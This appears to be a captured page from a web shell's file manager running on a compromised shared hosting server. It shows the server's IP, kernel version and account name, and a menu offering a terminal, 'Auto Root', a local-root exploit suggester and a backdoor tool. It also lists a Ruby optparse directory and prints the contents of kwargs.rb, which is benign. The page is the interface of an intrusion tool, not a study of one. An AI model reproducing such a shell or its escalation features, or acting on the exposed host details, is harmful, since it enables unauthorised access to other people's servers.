Linux premium82.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
Server IP : 185.61.154.194 & Your IP : 216.73.216.196
Domains :
Cant Read [ /etc/named.conf ]
User : evicodqw
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby34 /
share /
ruby /
optparse /
Delete
Unzip
Name
Size
Permission
Date
Action
ac.rb
1.99
KB
-rw-r--r--
2025-05-29 13:39
date.rb
368
B
-rw-r--r--
2025-05-29 13:39
kwargs.rb
716
B
-rw-r--r--
2025-05-29 13:39
shellwords.rb
164
B
-rw-r--r--
2025-05-29 13:39
time.rb
231
B
-rw-r--r--
2025-05-29 13:39
uri.rb
143
B
-rw-r--r--
2025-05-29 13:39
version.rb
2.14
KB
-rw-r--r--
2025-05-29 13:39
Save
Rename
# frozen_string_literal: true require_relative '../optparse' class OptionParser # :call-seq: # define_by_keywords(options, method, **params) # # :include: ../../doc/optparse/creates_option.rdoc # # Defines options which set in to _options_ for keyword parameters # of _method_. # # Parameters for each keywords are given as elements of _params_. # def define_by_keywords(options, method, **params) method.parameters.each do |type, name| case type when :key, :keyreq op, cl = *(type == :key ? %w"[ ]" : ["", ""]) define("--#{name}=#{op}#{name.upcase}#{cl}", *params[name]) do |o| options[name] = o end end end options end end